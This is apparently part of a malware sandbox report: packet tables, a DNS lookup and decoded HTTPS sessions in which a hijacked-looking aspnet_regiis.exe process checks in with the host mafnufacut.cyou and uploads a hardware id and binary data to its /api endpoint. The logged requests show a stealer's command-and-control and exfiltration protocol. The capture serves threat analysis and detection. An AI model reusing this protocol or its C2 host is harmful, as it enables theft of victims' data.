Oct 31, 2024 14:06:59.929394007 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.929441929 CET  49712        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:59.929625988 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.929709911 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.929776907 CET  49712        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:59.929858923 CET  49712        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:59.929867983 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:06:59.929881096 CET  49712        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:06:59.929884911 CET  443          49712      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:00.021590948 CET  49714        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:00.021609068 CET  443          49714      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:00.021671057 CET  49714        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:00.022006989 CET  49714        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:00.022018909 CET  443          49714      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:00.649272919 CET  443          49714      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:00.649369001 CET  49714        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:00.650794029 CET  49714        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:00.650799990 CET  443          49714      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:00.651024103 CET  443          49714      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:00.652420044 CET  49714        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:00.652600050 CET  49714        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:00.652625084 CET  443          49714      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:01.344109058 CET  443          49714      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:01.344176054 CET  443          49714      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:01.344305038 CET  49714        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:01.344589949 CET  49714        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:01.344600916 CET  443          49714      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:01.447390079 CET  49715        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:01.447422028 CET  443          49715      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:01.447515011 CET  49715        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:01.447916031 CET  49715        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:01.447937965 CET  443          49715      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:02.067682028 CET  443          49715      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:02.067758083 CET  49715        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:02.069294930 CET  49715        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:02.069308996 CET  443          49715      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:02.069561958 CET  443          49715      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:02.070755005 CET  49715        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:02.070894003 CET  49715        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:02.070926905 CET  443          49715      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:02.070981979 CET  49715        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:02.071002007 CET  443          49715      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:02.460407972 CET  443          49715      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:02.460479021 CET  443          49715      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:02.460531950 CET  49715        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:02.464251995 CET  49715        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:02.464274883 CET  443          49715      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:02.843514919 CET  49716        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:02.843548059 CET  443          49716      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:02.843617916 CET  49716        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:02.843978882 CET  49716        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:02.843990088 CET  443          49716      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:03.452019930 CET  443          49716      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:03.452181101 CET  49716        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:03.453664064 CET  49716        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:03.453670025 CET  443          49716      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:03.453891039 CET  443          49716      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:03.455089092 CET  49716        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:03.455248117 CET  49716        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:03.455275059 CET  443          49716      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:03.455349922 CET  49716        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:03.455357075 CET  443          49716      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:04.082669020 CET  443          49716      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:04.082751036 CET  443          49716      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:04.082839012 CET  49716        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:04.083024979 CET  49716        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:04.083035946 CET  443          49716      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:04.427027941 CET  49718        443        192.168.2.6    104.21.41.158
Oct 31, 2024 14:07:04.427057028 CET  443          49718      104.21.41.158  192.168.2.6
Oct 31, 2024 14:07:04.427130938 CET  49718        443        192.168.2.6    104.21.41.158
                                                                          Oct 31, 2024 14:07:04.427617073 CET49718443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:04.427624941 CET44349718104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.365690947 CET44349718104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.365767002 CET49718443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.367418051 CET49718443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.367427111 CET44349718104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.367799044 CET44349718104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.369086981 CET49718443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.369199991 CET49718443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.369206905 CET44349718104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.847348928 CET44349718104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.847613096 CET44349718104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.847683907 CET49718443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.847848892 CET49718443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.847860098 CET44349718104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.919291019 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.919329882 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:05.919404984 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.919780016 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:05.919790983 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:06.542700052 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:06.542857885 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:06.544337034 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:06.544347048 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:06.544589996 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:06.545986891 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:06.546091080 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:06.546097040 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:06.993411064 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:06.993516922 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:06.993609905 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:06.993895054 CET49724443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:06.993908882 CET44349724104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:07.025181055 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:07.025233030 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:07.025330067 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:07.025697947 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:07.025715113 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:07.632977962 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:07.633124113 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:07.634674072 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:07.634685040 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:07.634926081 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:07.636575937 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:07.636634111 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:07.636670113 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:08.115171909 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:08.115277052 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:08.115335941 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:08.115565062 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:08.115582943 CET44349730104.21.41.158192.168.2.6
                                                                          Oct 31, 2024 14:07:08.115593910 CET49730443192.168.2.6104.21.41.158
                                                                          Oct 31, 2024 14:07:08.115598917 CET44349730104.21.41.158192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 31, 2024 14:06:56.620754004 CET | 58020 | 53 | 192.168.2.6 | 1.1.1.1
Oct 31, 2024 14:06:56.650975943 CET | 53 | 58020 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 31, 2024 14:06:56.620754004 CET | 192.168.2.6 | 1.1.1.1 | 0xf9ae | Standard query (0) | mafnufacut.cyou | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 31, 2024 14:06:56.650975943 CET | 1.1.1.1 | 192.168.2.6 | 0xf9ae | No error (0) | mafnufacut.cyou | | 104.21.41.158 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 14:06:56.650975943 CET | 1.1.1.1 | 192.168.2.6 | 0xf9ae | No error (0) | mafnufacut.cyou | | 172.67.148.54 | A (IP address) | IN (0x0001) | false
                                                                          • mafnufacut.cyou
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49711 | 104.21.41.158 | 443 | 2096 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-31 13:06:57 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: mafnufacut.cyou
2024-10-31 13:06:57 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-31 13:06:58 UTC | 1008 | IN | HTTP/1.1 200 OK
Date: Thu, 31 Oct 2024 13:06:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=1jnnvigrgs0btq0ajm7t4gbv2m; expires=Mon, 24-Feb-2025 06:53:37 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hO0lUHI9Mzk59W8LbwNWQiT9Sa%2BlgNzOcSKgQWcT8dTiOfQniGdUVePI6P17riedDk9TGIWly4vCo5vD17ublZez4qAMHLQrkafKrVUAp%2FMl3fDP8MBQIxX2LtWzBTJ6mjE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db3dd87e926e78a-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1170&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=2296590&cwnd=237&unsent_bytes=0&cid=ddf2cb317c32330a&ts=1211&x=0"
2024-10-31 13:06:58 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-10-31 13:06:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
(The two IN records are the chunked response body: a 2-byte chunk carrying "ok", then the terminating zero-length chunk, so the server answered the act=life check-in with "ok".)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49712 | 104.21.41.158 | 443 | 2096 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-31 13:06:59 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 86
Host: mafnufacut.cyou
2024-10-31 13:06:59 UTC | 86 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 31 37 61 39 35 31 37 61 64 64 30 37 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--17a9517add07&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-10-31 13:06:59 UTC | 1021 | IN | HTTP/1.1 200 OK
Date: Thu, 31 Oct 2024 13:06:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=rhg2vkan6aot1utrj5e044qvi1; expires=Mon, 24-Feb-2025 06:53:38 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qYU%2FBmUR3KmI9EYZUnJzIhA4mEaY%2B6GTEmNeqogZDJa%2F7rqJ%2BkeWSQYAm07%2BwkRoI1i1Eqf1P%2BGhzeJdhcm72IJH0k5g33bHStQiYcDoVuLvbEvl1gz%2BGtb%2F2dp%2B0BYX9Yg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db3dd905cb90b86-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1787&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2837&recv_bytes=985&delivery_rate=1789864&cwnd=222&unsent_bytes=0&cid=ee8b5edfada5e707&ts=535&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49714 | 104.21.41.158 | 443 | 2096 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-31 13:07:00 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12866
Host: mafnufacut.cyou
2024-10-31 13:07:00 UTC | 12866 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 45 41 30 41 34 39 44 38 44 36 38 36 38 36 43 35 38 41 44 43 33 31 34 32 46 36 42 42 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 31 37 61 39 35
Data Ascii: --be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

7DEA0A49D8D68686C58ADC3142F6BB48
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

2
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

HpOoIh--17a95
2024-10-31 13:07:01 UTC | 1014 | IN | HTTP/1.1 200 OK
Date: Thu, 31 Oct 2024 13:07:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=6u37fl4q5timu7d9skslbrtdc2; expires=Mon, 24-Feb-2025 06:53:40 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPP1h%2Bj%2FFczkVUYBruOS4moQHKpeskdGV5TUf8BRlQoMgaaV0UGJ6QK3b0jPS9tpSgv4hqTyWto11ri3MfWDb47U1jwOspFC1MgVImRpiiOye8LR3%2FCNNfBtE1K%2BIgo6JGQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8db3dd997b6b2e24-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2124&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13805&delivery_rate=1324188&cwnd=251&unsent_bytes=0&cid=6647bd752be0e340&ts=702&x=0"
                                                                          2024-10-31 13:07:01 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                          Data Ascii: 11ok 173.254.250.77
                                                                          2024-10-31 13:07:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


Session ID: 3
Source IP: 192.168.2.6
Source Port: 49715
Destination IP: 104.21.41.158
Destination Port: 443
PID: 2096
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-31 13:07:02 UTC | 281 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15112
    Host: mafnufacut.cyou
2024-10-31 13:07:02 UTC | 15112 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 45 41 30 41 34 39 44 38 44 36 38 36 38 36 43 35 38 41 44 43 33 31 34 32 46 36 42 42 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 31 37 61 39 35
    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7DEA0A49D8D68686C58ADC3142F6BB48--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--17a95
2024-10-31 13:07:02 UTC | 1008 | IN | HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 13:07:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=lod12vhhkfdtlrflq7ml9p7uif; expires=Mon, 24-Feb-2025 06:53:41 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vCMinFJVNS04lPN1cGytuluOEjRZGFGsr2z6hjWZxfm8vMJXt2MDHMBncceHsbKbO1YLbvCw0glqLvqryhFWFUPtTsVPiYgpxaQ7%2B4Zd49td3svDAqO3kteUfyFPCSeP8Js%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8db3dda25b4c2e2a-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1397&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2837&recv_bytes=16051&delivery_rate=2086455&cwnd=234&unsent_bytes=0&cid=15a70c71b94f3e98&ts=398&x=0"
2024-10-31 13:07:02 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
    Data Ascii: 11ok 173.254.250.77
2024-10-31 13:07:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 4
Source IP: 192.168.2.6
Source Port: 49716
Destination IP: 104.21.41.158
Destination Port: 443
PID: 2096
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-31 13:07:03 UTC | 281 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 19970
    Host: mafnufacut.cyou
2024-10-31 13:07:03 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 45 41 30 41 34 39 44 38 44 36 38 36 38 36 43 35 38 41 44 43 33 31 34 32 46 36 42 42 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 31 37 61 39 35
    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7DEA0A49D8D68686C58ADC3142F6BB48--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--17a95
2024-10-31 13:07:03 UTC | 4639 | OUT | Data Raw: bb 32 f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b
    Data Ascii: 2+?2+?2+?o?Mp5
2024-10-31 13:07:04 UTC | 1017 | IN | HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 13:07:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=ds2mf8p1b96770sgt42lc5ee3l; expires=Mon, 24-Feb-2025 06:53:42 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qo47zpZQqneBjCW%2FrueMktRguGkNpivEH8Bjf%2FKiuxjDYAfqG4TKkAstE99cuog9VyZl2Wl7yv57vX3Mby1Hy40mbed0K4GRON4NZKo0bERTI5A%2BCY%2BcE%2BDrrPWMNKEJREc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8db3ddaaf999eaee-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1102&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2837&recv_bytes=20931&delivery_rate=2393388&cwnd=251&unsent_bytes=0&cid=3cc999abecb9714b&ts=636&x=0"
2024-10-31 13:07:04 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
    Data Ascii: 11ok 173.254.250.77
2024-10-31 13:07:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 5
Source IP: 192.168.2.6
Source Port: 49718
Destination IP: 104.21.41.158
Destination Port: 443
PID: 2096
